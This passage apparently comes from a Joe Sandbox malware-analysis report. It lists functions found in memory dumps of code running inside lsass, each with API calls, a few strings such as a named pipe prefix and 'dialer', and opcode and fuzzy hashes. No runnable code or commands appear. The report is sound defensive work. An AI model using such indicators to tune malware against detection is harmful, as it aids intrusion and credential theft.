                                                                  • Instruction Fuzzy Hash: F7117C26304780C2FB649B26E48C66D6365F788B94F26442BDF9D03765EF3EC55C8704
                                                                  Function 00000202C0AE5F60 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction ID: d96f967ab6355dfa8b00f5612883c3689d3872b8cdd91b00a9807c55c3fa80d2
                                                                  • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction Fuzzy Hash: 88D19976209B88C6EA70DB1AE49835E77A4F388B88F110517EBDD47BA6CF38C555CB40
                                                                  Function 00000202C0AE31CC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID: dialer
                                                                  • API String ID: 756756679-3528709123
                                                                  • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction ID: 99af3d401576157a454257e503e42e9700416411c5c03856acd84e38266f80dd
                                                                  • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                                  • Instruction Fuzzy Hash: B1318F23705B91C2FA50DF56E58C7AD63A0BB64B84F0A41278FD847B56EF34D4798300
                                                                  Function 00000202C0AED3D0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED415
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED442
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED453
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED464
                                                                  • SetLastError.KERNEL32(?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AED47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2506987500-0
                                                                  • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction ID: 8509bfb80ec8658d273bd47baca1274ffcff585c98ac53122ec09b9a895d6eee
                                                                  • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction Fuzzy Hash: 8E117F603053C0C2FE58A331A5DD32D2152AB58BF4F16472BEEBA0B7D7DE3898698200
                                                                  Function 00000202C0AE3B0C Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                  • String ID:
                                                                  • API String ID: 449555515-0
                                                                  • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction ID: ba41eaa8c83972b9c2955fdfe08bff1180164c354a4b3d26cc7be016e8e0f4c2
                                                                  • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction Fuzzy Hash: E3012D66611B44C2FB259B21E88CB1D63A4BB58B45F15452BCF4E06766EF3EC45C8700
                                                                  Function 00000202C0AE9418 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                                  • Instruction ID: c8981e0f0a630bc073eb3ea058f46c82ddab3b636a20e53b92a1993270bb8627
                                                                  • Opcode Fuzzy Hash: 124d9c0b905e6e6f2e62f9bd05bcfd16d2c666ef5833f5a39d15387171bb82e0
                                                                  • Instruction Fuzzy Hash: D951BE32211B80CAFB15CB25E48CB5D3799F340B88F528127EFA64778AEB35D859C718
                                                                  Function 00000202C0AB8835 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: 357e8c5ba4c628fba0ea65205fc2ee46afd9b4b5c85d8310afd22e6c4a784821
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: 0E518C32612700CAFB68CB29E48CB2D3B95F344BD8F528127DB564778AEB35D989C705
                                                                  Function 00000202C0AB8818 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction ID: 5f0c297950effa524e4e769826351e9490e2c10184b4866aaa5f5598b7c48bd8
                                                                  • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction Fuzzy Hash: B6313832211B40D6FB189F29E88C72D3BA4F740BD8F568117AF9647786DB39C989CB04
                                                                  Function 00000202C0AE330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction ID: c0dfb120e46251c085cc94f704bf45e2a309e4c6bc03487b974fea887a0dcd36
                                                                  • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction Fuzzy Hash: 6FF08262304B80D1FA109B13B98C11D6265BB48FC0F095133EF6A0BB2ACF2CC4598700
                                                                  Function 00000202C0AEC0C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction ID: dacdeb2503ec733809480f479b6f78915991b8d7b867b1ce9d4656bbfd3250fd
                                                                  • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction Fuzzy Hash: E6F06D66311B01D1FE148B28E8CC36D6324AB887A5F96031BDBAA462F6DF3EC14DC300
                                                                  Function 00000202C0AE5500 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction ID: 63aee3b9ec5174f52814ecfeb468680f3888a9a911f3f45aacd3126e13378fbb
                                                                  • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction Fuzzy Hash: B2029432219BC4C6EAA0CB55F49875EB7A0F384794F114517EBDE87BAADB78C458CB00
                                                                  Function 00000202C0AE5B40 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction ID: 8c1f0d9c981ea39f0d9591dff87f0d10d2555c98087178cb1a019aaa009f7cd6
                                                                  • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction Fuzzy Hash: 9061A462619B84C6F664CB25F49C71E77A0F388B88F110117EBDE47BA6DB78C5588B40
                                                                  Function 00000202C0AC3934 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: 9afaf77a51172dfa547c055fa4850f67a3c3b84cf19cedfec98b2ce3f0a1e798
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: C311C633A5CF00C5FA641568E4EE36D10407B54374F070A37AB76162EBCBBA884C8104
                                                                  Function 00000202C0AF4534 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: f70bf82c5cceb02d6e10d5093806def2d0eaeb57d5b80097f07828bafbb9e1e9
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 6F118233A14B11CBFA583268E4DE36D11816B58378F4B4637AB76067E7CB3A8C4D8208
                                                                  Function 00000202C0AEAE4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CallEncodePointerTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3544855599-2084237596
                                                                  • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction ID: 414ef94bc0d89e96803b88d928f4e21485ea40797e4d0dc57dbd216fb8bb788f
                                                                  • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction Fuzzy Hash: 0D615876600B84CAF720DF65D48839E77A0F355B88F054217EFA917B9ADB38E5A9C700
                                                                  Function 00000202C0ABA5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 9b7bf021ba2a726e85ca9365be4a1c125000aa5d10ce3b8ffd8aef1fa681eda9
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: 30515A72204780CAFB748F26959C35C77A0E364B94F1A5217DB9987BD6CB38D4A9CB00
                                                                  Function 00000202C0AEB1A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 4355c71fb95ee1ef40e57e6e02147f1081f46168938f00ea2bed68f88a9d16f9
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: 2B517C321107C1C6FB648B15A4CD35E77A0E755B84F164217DBE98BBD6CB38D869CB01
                                                                  Function 00000202C0AE3554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID: pid_
                                                                  • API String ID: 517849248-4147670505
                                                                  • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction ID: adfa0ac79cbee283e7e25f2939b0e43b70932ab6d07c4aaa56a3cfd0b151c1fc
                                                                  • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction Fuzzy Hash: CE115422318781E1FB609735E89D39E52A4F784780F9341239F9983796EF29C95DC740
                                                                  Function 00000202C0AF2488 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                  • String ID:
                                                                  • API String ID: 2718003287-0
                                                                  • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction ID: 86f804ca370ea88980c1900413645ff46994125e3e133b6105d09c27127dc8fa
                                                                  • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction Fuzzy Hash: C6D1AB33B04B80CAF711CFA9D4882AC77A1E354BD8F558217CF5A97B9ADA39C45AC740
                                                                  Function 00000202C0AE14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
